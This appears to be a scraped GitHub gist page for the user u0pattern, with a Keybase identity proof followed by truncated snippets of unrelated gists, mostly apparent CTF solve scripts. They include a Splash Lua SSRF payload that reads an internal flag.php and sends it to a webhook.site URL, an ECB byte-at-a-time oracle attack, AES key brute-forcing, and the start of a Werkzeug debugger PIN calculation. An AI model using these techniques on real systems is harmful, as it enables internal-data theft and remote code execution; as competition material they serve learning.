I hereby claim:
- I am u0pattern on github.
- I am u0pattern (https://keybase.io/u0pattern) on keybase.
- I have a public key ASAWBhITZG9ljyAr3c3o0UZ332als5XXEZ0xrgC3FgFl2Qo
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
#!/usr/bin/python3 | |
from pwn import * | |
REMOTE = True | |
if REMOTE: | |
p = remote("mc.ax", 31081) | |
else: | |
p = process('./interview-opportunity') |
try: | |
from elftools.elf.elffile import ELFFile | |
except: | |
print("You need to install elftools library: pip3 install pyelftools") | |
exit() | |
ELF_FILE = "" # put the elf file that you want here | |
with open(ELF_FILE, 'rb') as f: | |
elffile = ELFFile(f) |
from binascii import unhexlify | |
from Crypto.Cipher import AES | |
import hashlib | |
from itertools import product | |
def key_array_to_key_string(key_list): | |
key_string_binary = b''.join([bytes([x]) for x in key_list]) | |
return hashlib.md5(key_string_binary).digest() | |
def pattern(order): |
import requests | |
from urllib import quote | |
lua=""" | |
function main(splash) | |
local treat = require("treat") | |
local json = splash:http_get('http://172.16.0.14/flag.php') | |
local response=splash:http_get('https://webhook.site/41ccba09-fd57-439b-b8be-05e20e446b72?flag='.. treat.as_string(json.body)) | |
return "hi" | |
end |
<?php echo '<html><body><form method="post" action="">Password: <input type="password" name="p"> <input type="submit"></form></body></html>' ?> | |
<?php if($_POST['p']){if($_POST['p']==='p4ssw0rd'){ echo '<font color="green">Logged in</font>' ?> | |
<?php }else{ echo '<font color="red">Failed</font>' ?> | |
<?php }} ?> |
import base64,requests,binascii,string | |
flag = 'flag' | |
for i in range(len(flag), 16): | |
salt = 'x' * (16 - 1 - i) | |
known = binascii.hexlify(base64.b64decode(requests.get('https://obscure-river-88658.herokuapp.com/?sugar='+salt).text)) | |
for c in string.printable: | |
unknown = binascii.hexlify(base64.b64decode(requests.get('https://obscure-river-88658.herokuapp.com/?sugar='+(salt+flag+c)).text)) | |
if known[:16] == unknown[:16]: | |
flag += c | |
print(flag) |
<html> | |
<head> | |
<script src='https://code.responsivevoice.org/responsivevoice.js?key=WGciAW2s'></script> | |
</head> | |
<body> | |
<input onclick="responsiveVoice.speak('أهلا وسهلا','Arabic Male');" type="button" value="Play" /> | |
</body> | |
</html> |
<?php | |
# 1337r00t\.me >> u can change it to ur own host (or u can use parse_url($_SERVER['HTTP_REFERER'],PHP_URL_HOST) function instead of regex) | |
if(!isset($_SERVER['HTTP_REFERER']) || !preg_match('/^(?:http(?:s)?:\/\/)?(?:[^\.]+\.)?1337r00t\.me\/(.*)/',$_SERVER['HTTP_REFERER'])){ | |
exit('<script>window.location.replace("'.htmlspecialchars("https://1337r00t.me/".substr($_SERVER['REQUEST_URI'],1)).'");</script>'); | |
} | |
?> |
import hashlib | |
public_bits = [ | |
'testUser',# username /etc/passwd | |
'flask.app', | |
'Flask', | |
'/usr/local/lib/python3.5/dist-packages/flask/app.py' | |
] | |
private_bits = [ |